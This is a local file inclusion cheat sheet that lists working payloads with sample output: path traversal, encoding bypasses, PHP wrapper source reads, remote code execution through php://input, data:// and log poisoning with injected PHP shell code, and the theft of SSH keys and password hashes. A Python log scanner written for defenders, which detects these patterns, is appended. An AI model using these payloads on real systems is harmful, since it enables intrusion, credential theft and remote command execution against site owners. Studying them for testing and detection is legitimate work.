LOCAL FILE INCLUSION (LFI)
Basic LFI test
Path traversal — Confirm LFI exists
http://$IP/page.php?file=../../../etc/passwd
Example Output
http://10.10.10.5/page.php?file=../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
admin:x:1000:1000::/home/admin:/bin/bash
(LFI CONFIRMED)
Null byte bypass (old PHP)
PHP < 5.3.4 — Bypass extension append
http://$IP/page.php?file=../../../etc/passwd%00
Example Output
http://10.10.10.5/page.php?file=../../../etc/passwd%00
Code appends .php: include($_GET['file'] . '.php');
Null byte terminates string early in PHP < 5.3.4
Result: reads /etc/passwd instead of /etc/passwd.php
Double encoding
Bypass basic filters — URL encode twice
http://$IP/page.php?file=%252e%252e%252f%252e%252e%252fetc/passwd
Example Output
http://10.10.10.5/page.php?file=%252e%252e%252f%252e%252e%252fetc/passwd
%25 = %, so %252e = %2e = .
First decode: %252e%252e%252f -> %2e%2e%2f (no literal ../ yet); second decode -> ../
Bypasses a WAF/filter that only inspects the once-decoded value for ../
PHP wrapper - base64 read
Read PHP source code — See credentials in config
http://$IP/page.php?file=php://filter/convert.base64-encode/resource=config.php
Example Output
http://10.10.10.5/page.php?file=php://filter/convert.base64-encode/resource=config.php
PD9waHAKJGRiX2hvc3QgPSAnbG9jYWxob3N0JzsK...
base64 -d:
<?php
$db_host = 'localhost';
$db_user = 'admin';
$db_pass = 'SuperSecret123';
PHP wrapper - command exec
RCE via php://input — Direct command execution (needs allow_url_include=On, which is off by default)
curl http://$IP/page.php?file=php://input -d '<?php system("id"); ?>'
Example Output
curl http://10.10.10.5/page.php?file=php://input -d '<?php system("id"); ?>'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
(RCE CONFIRMED via php://input)
PHP data wrapper
RCE via data:// — base64 of <?php system($_GET['cmd']);?> (also needs allow_url_include=On)
http://$IP/page.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=&cmd=id
Example Output
http://10.10.10.5/page.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=&cmd=id
base64 decodes to: <?php system($_GET['cmd']);?>
Response: uid=33(www-data)
(RCE via data:// wrapper)
Log poisoning (Apache)
Inject PHP into logs, include log — RCE via log file
curl -A '<?php system($_GET["cmd"]); ?>' http://$IP
then: http://$IP/page.php?file=/var/log/apache2/access.log&cmd=id
Example Output
Step 1: curl -A '<?php system($_GET["cmd"]); ?>' http://10.10.10.5
Step 2: http://10.10.10.5/page.php?file=/var/log/apache2/access.log&cmd=id
... uid=33(www-data) gid=33(www-data) ...
(RCE via log poisoning)
Log poisoning (SSH)
Inject PHP via SSH username — Alternative log poisoning
ssh '<?php system($_GET["cmd"]); ?>'@$IP
then include /var/log/auth.log
Example Output
ssh '<?php system($_GET["cmd"]); ?>'@10.10.10.5
Permission denied
But PHP code is now in /var/log/auth.log
http://10.10.10.5/page.php?file=/var/log/auth.log&cmd=id
uid=33(www-data)
(RCE via SSH log poisoning)
Read SSH keys
Steal private keys — SSH access
http://$IP/page.php?file=../../../home/<user>/.ssh/id_rsa
Example Output
http://10.10.10.5/page.php?file=../../../home/admin/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA...
-----END RSA PRIVATE KEY-----
Save to file, chmod 600, ssh -i id_rsa admin@target
(LFI to SSH key = instant foothold)
Read /etc/shadow (if root)
Password hashes — Crack with hashcat/john
http://$IP/page.php?file=../../../etc/shadow
Example Output
http://10.10.10.5/page.php?file=../../../etc/shadow
root:$6$abc123$LongHashHere:19000:0:99999:7:::
admin:$6$def456$AnotherHash:19000:0:99999:7:::
(Copy hashes, crack with hashcat -m 1800)
Common files to read
Sensitive file targets — Creds, users, config
/etc/passwd
/etc/shadow
/etc/hosts
/home/<user>/.bash_history
/proc/self/environ
/var/www/html/config.php
/var/www/html/.htpasswd
Example Output
/etc/passwd -> usernames
/etc/shadow -> password hashes (if readable)
/home/user/.ssh/id_rsa -> SSH private key
/var/www/html/config.php -> DB credentials
/proc/self/environ -> environment variables with secrets
~/.bash_history -> command history with passwords
Windows LFI paths
Windows file targets — Windows path format
..\..\..\windows\system32\drivers\etc\hosts
..\..\..\windows\win.ini
..\..\..\inetpub\wwwroot\web.config
Example Output
..\..\..\windows\system32\drivers\etc\hosts
-> 127.0.0.1 localhost
..\..\..\inetpub\wwwroot\web.config
-> <connectionStrings>Password=DBp@ss</connectionStrings>
..\..\..\windows\win.ini
-> [fonts] (confirms LFI on Windows)
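Defender-side companion to the payloads above, added here and not part of the original cheat sheet: a small Python scanner that runs the page's request patterns (traversal, double encoding, php:// and data:// wrappers, log-file includes, PHP tags in the User-Agent used for Apache log poisoning) over constructed Apache access-log lines. The log lines, the tag names and the sensitive-path list are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-log lines (not from any real host), one per payload
# class on this page; the last line is benign and must not be flagged.
SAMPLE_LOG = """\
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /page.php?file=../../../etc/passwd HTTP/1.1" 200 1843 "-" "curl/8.0"
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /page.php?file=%252e%252e%252f%252e%252e%252fetc/passwd HTTP/1.1" 200 1843 "-" "curl/8.0"
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /page.php?file=php://filter/convert.base64-encode/resource=config.php HTTP/1.1" 200 512 "-" "curl/8.0"
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /page.php?file=/var/log/apache2/access.log&cmd=id HTTP/1.1" 200 9000 "-" "curl/8.0"
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET / HTTP/1.1" 200 300 "-" "<?php system($_GET['cmd']); ?>"
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /page.php?file=about HTTP/1.1" 200 700 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+)[^"]*" '
                    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
TARGET_RULES = [  # checked against the fully decoded request target
    ('TRAVERSAL', re.compile(r'\.\.[/\\]')),
    ('PHP_WRAPPER', re.compile(r'(?i)\b(php|data|expect|phar|zip)://')),
    ('SENSITIVE_PATH', re.compile(r'(?i)/etc/(passwd|shadow)|/proc/self/environ|\.ssh/id_rsa|/var/log/|\.bash_history|win\.ini|web\.config')),
]
PHP_TAG_RE = re.compile(r'<\?(php|=)')

def full_decode(value, max_rounds=3):
    """URL-decode until stable; return (decoded, rounds that changed it).
    Two effective rounds is the signature of double encoding (%252e -> %2e -> .)."""
    rounds = 0
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def analyse_line(line):
    """Return {'ip': ..., 'tags': [...]} for a suspicious line, None for a benign one."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target, rounds = full_decode(m.group('target'))
    tags = {tag for tag, rx in TARGET_RULES if rx.search(target)}
    if rounds >= 2:
        tags.add('DOUBLE_ENCODING')
    # Log poisoning: PHP tags in a header field that Apache writes to access.log.
    if any(PHP_TAG_RE.search(full_decode(m.group(f))[0]) for f in ('ua', 'referer')):
        tags.add('LOG_POISON_HEADER')
    return {'ip': m.group('ip'), 'tags': sorted(tags)} if tags else None

def scan(log_text):
    return [f for f in map(analyse_line, log_text.splitlines()) if f]
```

Decoding until the value stops changing is what makes the double-encoded line visible; a filter that decodes once sees only %2e%2e%2f.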